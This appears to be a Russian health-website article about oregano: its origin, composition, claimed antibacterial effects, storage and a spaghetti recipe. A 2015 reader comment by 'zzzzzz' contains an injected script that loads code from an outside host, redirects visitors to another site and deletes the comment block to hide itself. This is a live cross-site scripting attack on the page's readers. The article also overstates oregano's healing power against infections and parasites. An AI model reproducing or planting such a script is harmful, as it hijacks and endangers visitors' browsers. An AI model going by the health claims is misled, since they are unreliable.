Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Орегано. Не экзотика, а о...  >>  Орегано. Не экзотика, а обычная душица
 
Обратная связь
 

Орегано. Не экзотика, а обычная душица

Размер шрифта
02 февраля 2012 08:00
  • google_analytics: false
  • Нравится

Орегано – однолетнее кустистое растение, родственник мяты. Другое название – душица обыкновенная.

1

Слово «орегано» – греческого происхождения и означает «радость гор». Родина орегано – холмы Средиземноморского региона и Ближнего Востока, но он рано был принесен европейцами в Западное полушарие и теперь встречается в дикой природе почти по всей Северной Америке. Растет орегано в Западной и Восточной Европе, на Кавказе, в горных районах Средней Азии, Казахстане, Южной Сибири, как заносное растение встречается на Дальнем Востоке.

Листья орегано, также как и листья мяты, мелиссы, благодаря эфирным маслам, входящим в их состав, используют для лечебных ванн, которые действуют успокоительно и обезболивающе. Это – дезинфицирующее, противовоспалительное, мочегонное средство, а также антисептик. В древности считалось, что жевание орегано способствует подавлению зубной и головной боли.

В состав орегано входят эфирные масла (до 0,5 %), тимол, карвакрол, дубильные вещества и розмариновая кислота. Душица содержит дубильные вещества и аскорбиновую кислоту (мг%): цветки – 166, листья – 565 и стебли – 58.

Пьедестал почета по содержанию карвакрола:

1. Эфирное масло орегано 50% - 80%

2. Эфирное масло тимьяна – 5% -75%

3. Эфирное масло базилика – не содержит

Специалисты из Университета Западной Англии в Бристоле вместе с индийскими коллегами обнаружили, что в масле орегано содержится вещество карвакрол, обладающее сильными антигрибковыми и антибактериальными свойствами. Карвакрол по своему действию оказался намного сильнее 18 популярных антибиотиков, с которыми его сравнивали ученые.

Карвакрол лечит грибковые инфекции, убивает паразитов типа лямблий (мелких глистов, живущих в тонком кишечнике и желчном пузыре). При регулярном употреблении орегано в пищу, каждый способен самостоятельно защитить себя от многих инфекций и паразитов.По словам исследователей, из масла орегано можно изготавливать антисептический спрей, антибактериальное мыло, салфетки, а также дезинфицирующие стиральные порошки.

Как выбрать

По возможности выбирайте и отдавайте предпочтение свежему растению, чем сухому, так как это влияет на вкусовые качества.

Листья должны выглядеть свежими и иметь яркий зеленый цвет, а стебли должны быть твердыми. На них не должно быть темных или желтоватых пятен.

Как хранить

Свежий орегано следует хранить в холодильнике, завернув в слегка влажное бумажное полотенце. Но лучше всего в специальном контейнере для хранения зелени. В нем можно хранить до 3-х недель. Для использования снимите верхнюю прозрачную панель. Установите зелень на держатель и, сняв поддон с контейнера, прополощите ее под краном. Закройте панель контейнера, затем извлеките пробку и заполните контейнер пресной водой. Регулярная замена воды позволит дольше сохранить вашу зелень свежей.

Сушеную специю следует хранить в плотно закрытой стеклянной таре в сухом и темном месте, где оно будет сохранять свою свежесть в течение примерно шести месяцев.

Можно заморозить. Свежую травку вымыть, подсушить, измельчить до однородной массы, добавить немного оливкового масла – положить в морозилку в герметичную тару, получится замороженное пюре.

Как готовить

Свежий или сухой орегано нужно добавлять в конце процесса приготовления, поскольку тепло может легко привести к потере его нежного вкуса.

С помощью орегано можно улучшить вкус растительного масла, для этого нужно свежую веточку положить в емкость с растительным маслом, это придаст маслу тонкий приятный аромат.

Орегано имеет антисептические свойства, поэтому его листья добавляют в маринад, если нужно подольше сохранить мясо свежим.

Особенно любят душицу в итальянской кухне. Томатный соус к спагетти – пожалуй, лучшее употребление для орегано. Еще одно итальянское блюдо, тесно связанное с орегано – пицца.

Рецепт: спагетти с орегано

Время приготовления - 15 минут.

Отварить спагетти в слегка подсоленной воде.

Помидоры черри разрезать пополам. Чеснок раздавить плоской стороной ножа. Разогреть в сковороде 2 ст. ложки оливкового масла, добавить раздавленный чеснок, помидоры, 1 ч. ложку тимьяна и 1 ч. ложку орегано, все вместе слегка прогреть. Выложить в сковороду к помидорам отваренные макароны, влить немного воды, добавить оставшиеся орегано и тимьян, немного оливкового масла, перемешать и подавать на стол.
 

 


Cюжеты по теме:
Орегано. Не экзотика, а обычная душица

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

4 рецепта на 3 дня: минус 2 килограмма Приправы для здоровья
Что бы такого съесть, чтобы похудеть    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.